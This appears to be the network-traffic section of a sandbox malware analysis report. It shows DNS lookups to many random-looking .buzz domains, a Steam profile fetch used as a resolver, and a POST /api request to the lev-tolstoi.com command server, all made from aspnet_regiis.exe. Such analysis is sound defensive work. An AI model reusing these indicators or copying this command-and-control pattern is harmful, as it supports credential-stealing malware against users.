                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.556579113 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.556587934 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.556607008 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.556663036 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.564948082 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.613300085 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.659634113 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.707046986 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.707061052 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.735547066 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.735613108 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.735620975 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.735672951 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.735723972 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.735835075 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.735847950 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.735863924 CET49706443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.735867977 CET44349706172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.887257099 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.887304068 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.887383938 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.887825966 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:10.887845039 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.146136045 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.146214962 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.147571087 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.147602081 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.147846937 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.149066925 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.149209023 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:12.149252892 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.191535950 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.191626072 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.191689968 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.191910982 CET49707443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.191934109 CET44349707172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.330807924 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.330873966 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.330962896 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.331264973 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:13.331296921 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.544581890 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.544670105 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.546017885 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.546034098 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.546292067 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.547377110 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.547482967 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.547528028 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.547585011 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:14.591350079 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.406893969 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.406982899 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.407098055 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.407341003 CET49708443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.407377005 CET44349708172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.602843046 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.602890015 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.602981091 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.603291035 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:15.603303909 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.862751961 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.862818003 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.864403009 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.864415884 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.864666939 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.865936041 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.866067886 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.866101980 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.866153955 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:16.866162062 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:17.808245897 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:17.808355093 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:17.808418036 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:17.808521986 CET49709443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:17.808543921 CET44349709172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:18.140233994 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:18.140309095 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:18.140425920 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:18.140702963 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:18.140733957 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.402048111 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.402132988 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.403440952 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.403455019 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.403697968 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.404912949 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.404969931 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:19.404980898 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.182389021 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.182498932 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.182638884 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.182786942 CET49710443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.182811975 CET44349710172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.263494015 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.263552904 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.263650894 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.263946056 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:20.263959885 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.574517012 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.574599981 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.576083899 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.576096058 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.576318979 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.577749014 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.577846050 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:21.577871084 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:22.401207924 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:22.401307106 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:22.401367903 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:22.401518106 CET49713443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:22.401535988 CET44349713172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:22.491939068 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:22.491976023 CET44349716172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:22.492347956 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:22.492588043 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:22.492599964 CET44349716172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:23.705914021 CET44349716172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:23.705985069 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:23.727328062 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:23.727344990 CET44349716172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:23.727560043 CET44349716172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:23.785281897 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:23.839046955 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:23.839234114 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:23.839256048 CET44349716172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:24.619946957 CET44349716172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:24.620054007 CET44349716172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:24.620099068 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:24.620249987 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:24.620260000 CET44349716172.67.157.254192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:24.620270967 CET49716443192.168.2.5172.67.157.254
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:24.620276928 CET44349716172.67.157.254192.168.2.5

                                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.048746109 CET6539453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.281878948 CET53653941.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.286295891 CET5409753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.452183962 CET53540971.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.454947948 CET5195353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.597414017 CET53519531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.599823952 CET6508653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.738172054 CET53650861.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.740771055 CET5090153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.879699945 CET53509011.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.884238005 CET6502553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.024915934 CET53650251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.048763037 CET5452053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.186151028 CET53545201.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.188045025 CET5299353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.424678087 CET53529931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.427191973 CET5756453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.565334082 CET53575641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.587410927 CET6392853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.726411104 CET53639281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.282953024 CET5660153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.429471970 CET53566011.1.1.1192.168.2.5

                                                                                                                                                                                                                                                                DNS Queries

                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.048746109 CET192.168.2.51.1.1.10x8ad9Standard query (0)ingreem-eilish.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.286295891 CET192.168.2.51.1.1.10xfbc3Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.454947948 CET192.168.2.51.1.1.10x7c92Standard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.599823952 CET192.168.2.51.1.1.10xad33Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.740771055 CET192.168.2.51.1.1.10x249bStandard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.884238005 CET192.168.2.51.1.1.10xc476Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.048763037 CET192.168.2.51.1.1.10x765Standard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.188045025 CET192.168.2.51.1.1.10xfc17Standard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.427191973 CET192.168.2.51.1.1.10xbbStandard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.587410927 CET192.168.2.51.1.1.10xaf86Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.282953024 CET192.168.2.51.1.1.10x7209Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                DNS Answers

                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.281878948 CET1.1.1.1192.168.2.50x8ad9Name error (3)ingreem-eilish.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.452183962 CET1.1.1.1192.168.2.50xfbc3Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.597414017 CET1.1.1.1192.168.2.50x7c92Name error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.738172054 CET1.1.1.1192.168.2.50xad33Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:02.879699945 CET1.1.1.1192.168.2.50x249bName error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.024915934 CET1.1.1.1192.168.2.50xc476Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.186151028 CET1.1.1.1192.168.2.50x765Name error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.424678087 CET1.1.1.1192.168.2.50xfc17Name error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.565334082 CET1.1.1.1192.168.2.50xbbName error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:03.726411104 CET1.1.1.1192.168.2.50xaf86No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.429471970 CET1.1.1.1192.168.2.50x7209No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 28, 2024 22:05:06.429471970 CET1.1.1.1192.168.2.50x7209No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                                                                                                • lev-tolstoi.com

                                                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                0192.168.2.54970423.55.153.1064435772C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-28 21:05:05 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                                                                                2024-12-28 21:05:06 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                Date: Sat, 28 Dec 2024 21:05:05 GMT
                                                                                                                                                                                                                                                                Content-Length: 35121
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Set-Cookie: sessionid=4c1bdccd71786aa257e88386; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                2024-12-28 21:05:06 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                2024-12-28 21:05:06 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                2024-12-28 21:05:06 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                1192.168.2.549705172.67.157.2544435772C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-12-28 21:05:07 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
